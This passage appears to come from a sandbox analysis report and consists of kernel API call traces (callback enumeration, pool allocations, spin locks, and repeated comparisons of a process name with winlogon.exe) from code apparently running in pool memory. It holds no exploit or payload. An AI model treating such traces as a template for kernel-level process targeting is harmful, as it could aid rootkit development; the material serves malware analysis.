| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffe001f8 |
| RtlImageDirectoryEntryToData | BaseAddress_ptr = 0xfffff961ffe00000, MappedAsImage = 1, Directory = 0x0, Size_ptr_out = 0xffffd0002d573808, ret_val_ptr_out = 0xfffff961fff2a000 |
| RtlImageDirectoryEntryToData | BaseAddress_ptr = 0xfffff961ffe00000, MappedAsImage = 1, Directory = 0xc, Size_ptr_out = 0xffffd0002d573808, ret_val_ptr_out = 0xfffff961fff19000 |
| RtlImageDirectoryEntryToData | BaseAddress_ptr = 0xfffff961ffe00000, MappedAsImage = 1, Directory = 0xa, Size_ptr_out = 0xffffd0002d573808, ret_val_ptr_out = 0xfffff961ffeec730 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x57dbe, Tag = 0x63536c41, ret_val_ptr_out = 0xffffe0003c959000 |
| ExFreePool | P_ptr = 0xffffe0003ca01000 |
| RtlImageNtHeader | BaseAddress_ptr = 0xfffff961ffe00000, ret_val_unk_out = 0xfffff961ffe000f0 |
| RtlLookupFunctionTable | ret_val_out = 0xfffff961ffce9000 |
| RtlImageNtHeader | BaseAddress_ptr = 0xfffff961ffce0000, ret_val_unk_out = 0xfffff961ffce00e0 |
| MmDetachSession | ret_val_out = 0x0 |
| MmQuitNextSession | ret_val_out = 0x0 |
| KeSetCoalescableTimer | Timer_unk = 0xffffe0003a471b4d, DueTime_unk = 0xffffffffb50e074b, Period = 0x0, TolerableDelay = 0x13cf, Dpc_unk = 0xffffe0003a47ed64, Timer_unk_out = 0xffffe0003a471b4d, ret_val_out = 0 |
Kernel Graph 3
Code Block #3 (EP #174)
»
| Information | Value |
|---|---|
| Trigger | ExpWorkerThread+0xe7 |
| Start Address | 0xffffe0003a774934 |
Execution Path #174 (length: 998, count: 1, processes: 1 incomplete)
»
| Information | Value |
|---|---|
| Sequence Length | 998 |
Processes
»
| Process | Count |
|---|---|
| Process 2 (System, PID: 4) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| ExpEnumerateCallback | ret_val_out = 0x0 |
| ExpGetNextCallback | ret_val_out = 0xffffe0003a46df30 |
| ExpEnumerateCallback | ret_val_out = 0x0 |
| ExpGetNextCallback | ret_val_out = 0xffffe0003a487ac0 |
| ExpEnumerateCallback | ret_val_out = 0x0 |
| ExpGetNextCallback | ret_val_out = 0xffffe0003a487a20 |
| ExpEnumerateCallback | ret_val_out = 0xfffff800f7ae64c0 |
| RtlPcToFileHeader | PcValue_ptr = 0xfffff800f7ae64c0, BaseOfImage_ptr_out = 0xffffd0002d5ecef8, BaseOfImage_out = 0xfffff800f7ae0000, ret_val_ptr_out = 0xfffff800f7ae0000 |
| ExpEnumerateCallback | ret_val_out = 0xfffff80041b86ea4 |
| RtlPcToFileHeader | PcValue_ptr = 0xfffff80041b86ea4, BaseOfImage_ptr_out = 0xffffd0002d5ecef8, BaseOfImage_out = 0xfffff80041684000, ret_val_ptr_out = 0xfffff80041684000 |
| ExpEnumerateCallback | ret_val_out = 0xfffff80041627a20 |
| RtlPcToFileHeader | PcValue_ptr = 0xfffff80041627a20, BaseOfImage_ptr_out = 0xffffd0002d5ecef8, BaseOfImage_out = 0xfffff80041611000, ret_val_ptr_out = 0xfffff80041611000 |
| ExpEnumerateCallback | ret_val_out = 0xfffff800f7ec36f0 |
| RtlPcToFileHeader | PcValue_ptr = 0xfffff800f7ec36f0, BaseOfImage_ptr_out = 0xffffd0002d5ecef8, BaseOfImage_out = 0xfffff800f7ea0000, ret_val_ptr_out = 0xfffff800f7ea0000 |
| ExpEnumerateCallback | ret_val_out = 0xfffff800f81bdc30 |
| RtlPcToFileHeader | PcValue_ptr = 0xfffff800f81bdc30, BaseOfImage_ptr_out = 0xffffd0002d5ecef8, BaseOfImage_out = 0xfffff800f8180000, ret_val_ptr_out = 0xfffff800f8180000 |
| ExpEnumerateCallback | ret_val_out = 0xfffff800f806fd20 |
| RtlPcToFileHeader | PcValue_ptr = 0xfffff800f806fd20, BaseOfImage_ptr_out = 0xffffd0002d5ecef8, BaseOfImage_out = 0xfffff800f8040000, ret_val_ptr_out = 0xfffff800f8040000 |
| ExpEnumerateCallback | ret_val_out = 0xfffff800f806fd20 |
| RtlPcToFileHeader | PcValue_ptr = 0xfffff800f806fd20, BaseOfImage_ptr_out = 0xffffd0002d5ecef8, BaseOfImage_out = 0xfffff800f8040000, ret_val_ptr_out = 0xfffff800f8040000 |
| ExpEnumerateCallback | ret_val_out = 0xfffff800f921c760 |
| RtlPcToFileHeader | PcValue_ptr = 0xfffff800f921c760, BaseOfImage_ptr_out = 0xffffd0002d5ecef8, BaseOfImage_out = 0xfffff800f9170000, ret_val_ptr_out = 0xfffff800f9170000 |
| ExpEnumerateCallback | ret_val_out = 0xfffff800f806fd20 |
| RtlPcToFileHeader | PcValue_ptr = 0xfffff800f806fd20, BaseOfImage_ptr_out = 0xffffd0002d5ecef8, BaseOfImage_out = 0xfffff800f8040000, ret_val_ptr_out = 0xfffff800f8040000 |
| ExpEnumerateCallback | ret_val_out = 0xfffff800f806fd20 |
| RtlPcToFileHeader | PcValue_ptr = 0xfffff800f806fd20, BaseOfImage_ptr_out = 0xffffd0002d5ecef8, BaseOfImage_out = 0xfffff800f8040000, ret_val_ptr_out = 0xfffff800f8040000 |
| ExpEnumerateCallback | ret_val_out = 0xfffff800f806fd20 |
| RtlPcToFileHeader | PcValue_ptr = 0xfffff800f806fd20, BaseOfImage_ptr_out = 0xffffd0002d5ecef8, BaseOfImage_out = 0xfffff800f8040000, ret_val_ptr_out = 0xfffff800f8040000 |
| ExpEnumerateCallback | ret_val_out = 0xfffff800f806fd20 |
| RtlPcToFileHeader | PcValue_ptr = 0xfffff800f806fd20, BaseOfImage_ptr_out = 0xffffd0002d5ecef8, BaseOfImage_out = 0xfffff800f8040000, ret_val_ptr_out = 0xfffff800f8040000 |
| ExpEnumerateCallback | ret_val_out = 0xfffff800f806fd20 |
| RtlPcToFileHeader | PcValue_ptr = 0xfffff800f806fd20, BaseOfImage_ptr_out = 0xffffd0002d5ecef8, BaseOfImage_out = 0xfffff800f8040000, ret_val_ptr_out = 0xfffff800f8040000 |
| ExpEnumerateCallback | ret_val_out = 0x0 |
| ExpGetNextCallback | ret_val_out = 0xffffe0003a487980 |
| ExpEnumerateCallback | ret_val_out = 0xfffff800f7eea420 |
| RtlPcToFileHeader | PcValue_ptr = 0xfffff800f7eea420, BaseOfImage_ptr_out = 0xffffd0002d5ecef8, BaseOfImage_out = 0xfffff800f7ea0000, ret_val_ptr_out = 0xfffff800f7ea0000 |
| ExpEnumerateCallback | ret_val_out = 0xfffff800f86f6a30 |
| RtlPcToFileHeader | PcValue_ptr = 0xfffff800f86f6a30, BaseOfImage_ptr_out = 0xffffd0002d5ecef8, BaseOfImage_out = 0xfffff800f8630000, ret_val_ptr_out = 0xfffff800f8630000 |
| ExpEnumerateCallback | ret_val_out = 0xfffff800f92836b0 |
| RtlPcToFileHeader | PcValue_ptr = 0xfffff800f92836b0, BaseOfImage_ptr_out = 0xffffd0002d5ecef8, BaseOfImage_out = 0xfffff800f9170000, ret_val_ptr_out = 0xfffff800f9170000 |
| ExpEnumerateCallback | ret_val_out = 0xfffff80041cb5748 |
| RtlPcToFileHeader | PcValue_ptr = 0xfffff80041cb5748, BaseOfImage_ptr_out = 0xffffd0002d5ecef8, BaseOfImage_out = 0xfffff80041684000, ret_val_ptr_out = 0xfffff80041684000 |
| ExpEnumerateCallback | ret_val_out = 0xfffff800f9ee4230 |
| RtlPcToFileHeader | PcValue_ptr = 0xfffff800f9ee4230, BaseOfImage_ptr_out = 0xffffd0002d5ecef8, BaseOfImage_out = 0xfffff800f9e50000, ret_val_ptr_out = 0xfffff800f9e50000 |
| ExpEnumerateCallback | ret_val_out = 0xfffff800faac8930 |
| RtlPcToFileHeader | PcValue_ptr = 0xfffff800faac8930, BaseOfImage_ptr_out = 0xffffd0002d5ecef8, BaseOfImage_out = 0xfffff800faac0000, ret_val_ptr_out = 0xfffff800faac0000 |
| ExpEnumerateCallback | ret_val_out = 0x0 |
| ExpGetNextCallback | ret_val_out = 0xffffe0003a467330 |
| ExpEnumerateCallback | ret_val_out = 0x0 |
| ExpGetNextCallback | ret_val_out = 0xffffe0003a467290 |
| ExpEnumerateCallback | ret_val_out = 0x0 |
| ExpGetNextCallback | ret_val_out = 0xffffe0003a45ed00 |
| ExpEnumerateCallback | ret_val_out = 0x0 |
| ExpGetNextCallback | ret_val_out = 0xffffe0003a49ccb0 |
| ExpEnumerateCallback | ret_val_out = 0xfffff800417732b4 |
| RtlPcToFileHeader | PcValue_ptr = 0xfffff800417732b4, BaseOfImage_ptr_out = 0xffffd0002d5ecef8, BaseOfImage_out = 0xfffff80041684000, ret_val_ptr_out = 0xfffff80041684000 |
| ExpEnumerateCallback | ret_val_out = 0x0 |
| ExpGetNextCallback | ret_val_out = 0xffffe0003a499d70 |
| ExpEnumerateCallback | ret_val_out = 0xfffff80041cbf62c |
| RtlPcToFileHeader | PcValue_ptr = 0xfffff80041cbf62c, BaseOfImage_ptr_out = 0xffffd0002d5ecef8, BaseOfImage_out = 0xfffff80041684000, ret_val_ptr_out = 0xfffff80041684000 |
| ExpEnumerateCallback | ret_val_out = 0x0 |
| ExpGetNextCallback | ret_val_out = 0xffffe0003a4a7cb0 |
| ExpEnumerateCallback | ret_val_out = 0xfffff80041b86ec8 |
| RtlPcToFileHeader | PcValue_ptr = 0xfffff80041b86ec8, BaseOfImage_ptr_out = 0xffffd0002d5ecef8, BaseOfImage_out = 0xfffff80041684000, ret_val_ptr_out = 0xfffff80041684000 |
| ExpEnumerateCallback | ret_val_out = 0x0 |
| ExpGetNextCallback | ret_val_out = 0xffffe0003b091710 |
| ExpEnumerateCallback | ret_val_out = 0xfffff800f7c9cf80 |
| RtlPcToFileHeader | PcValue_ptr = 0xfffff800f7c9cf80, BaseOfImage_ptr_out = 0xffffd0002d5ecef8, BaseOfImage_out = 0xfffff800f7c90000, ret_val_ptr_out = 0xfffff800f7c90000 |
| ExpEnumerateCallback | ret_val_out = 0x0 |
| ExpGetNextCallback | ret_val_out = 0xffffe0003b5af6d0 |
| ExpEnumerateCallback | ret_val_out = 0x0 |
| ExpGetNextCallback | ret_val_out = 0xffffe0003b5c8270 |
| ExpEnumerateCallback | ret_val_out = 0x0 |
| ExpGetNextCallback | ret_val_out = 0xffffe0003b5c81d0 |
| ExpEnumerateCallback | ret_val_out = 0x0 |
| ExpGetNextCallback | ret_val_out = 0xffffe0004c915460 |
| ExpEnumerateCallback | ret_val_out = 0x0 |
| ExpGetNextCallback | ret_val_out = 0xffffe0003bdb7650 |
| ExpEnumerateCallback | ret_val_out = 0x0 |
| ExpGetNextCallback | ret_val_out = 0xffffe0003be17530 |
| ExpEnumerateCallback | ret_val_out = 0xfffff800f9e34040 |
| RtlPcToFileHeader | PcValue_ptr = 0xfffff800f9e34040, BaseOfImage_ptr_out = 0xffffd0002d5ecef8, BaseOfImage_out = 0xfffff800f9e30000, ret_val_ptr_out = 0xfffff800f9e30000 |
| ExpEnumerateCallback | ret_val_out = 0x0 |
| ExpGetNextCallback | ret_val_out = 0x0 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x59417, Tag = 0x6944624f, ret_val_ptr_out = 0xffffe0003c9b1000 |
| KeSetCoalescableTimer | Timer_unk = 0xffffe0003af29384, DueTime_unk = 0xffffffffb7eff981, Period = 0x0, TolerableDelay = 0xacb, Dpc_unk = 0xffffe0003af293c4, Timer_unk_out = 0xffffe0003af29384, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003b09a080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003b09a4d0 |
| _stricmp | _Str1 = conhost.exe, _Str2 = winlogon.exe, ret_val_out = -20 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003b09a080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003b09a4d0 |
| _stricmp | _Str1 = conhost.exe, _Str2 = winlogon.exe, ret_val_out = -20 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003b09a080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003b09a4d0 |
| _stricmp | _Str1 = conhost.exe, _Str2 = winlogon.exe, ret_val_out = -20 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003b09a080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003b09a4d0 |
| _stricmp | _Str1 = conhost.exe, _Str2 = winlogon.exe, ret_val_out = -20 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003b09a080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003b09a4d0 |
| _stricmp | _Str1 = conhost.exe, _Str2 = winlogon.exe, ret_val_out = -20 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003b09a080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003b09a4d0 |
| _stricmp | _Str1 = conhost.exe, _Str2 = winlogon.exe, ret_val_out = -20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7886f4, SpinLock_unk_out = 0xffffe0003a7886f4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7886f4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7886f4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a78773c, SpinLock_unk_out = 0xffffe0003a78773c, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a78773c, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a78773c |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| AfdDisconnectEventHandler | ret_val_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a766fe4, SpinLock_unk_out = 0xffffe0003a766fe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a766fe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a766fe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a76f65c, SpinLock_unk_out = 0xffffe0003a76f65c, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a76f65c, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a76f65c |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| AfdDisconnectEventHandler | ret_val_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a769d84, SpinLock_unk_out = 0xffffe0003a769d84, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a769d84, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a769d84 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a76f47c, SpinLock_unk_out = 0xffffe0003a76f47c, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a76f47c, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a76f47c |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| AfdDisconnectEventHandler | ret_val_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a76efe4, SpinLock_unk_out = 0xffffe0003a76efe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a76efe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a76efe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7a43dc, SpinLock_unk_out = 0xffffe0003a7a43dc, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7a43dc, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7a43dc |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| AfdDisconnectEventHandler | ret_val_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a76ffe4, SpinLock_unk_out = 0xffffe0003a76ffe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a76ffe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a76ffe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a76eb5c, SpinLock_unk_out = 0xffffe0003a76eb5c, ret_val_unk_out = 0x2 |
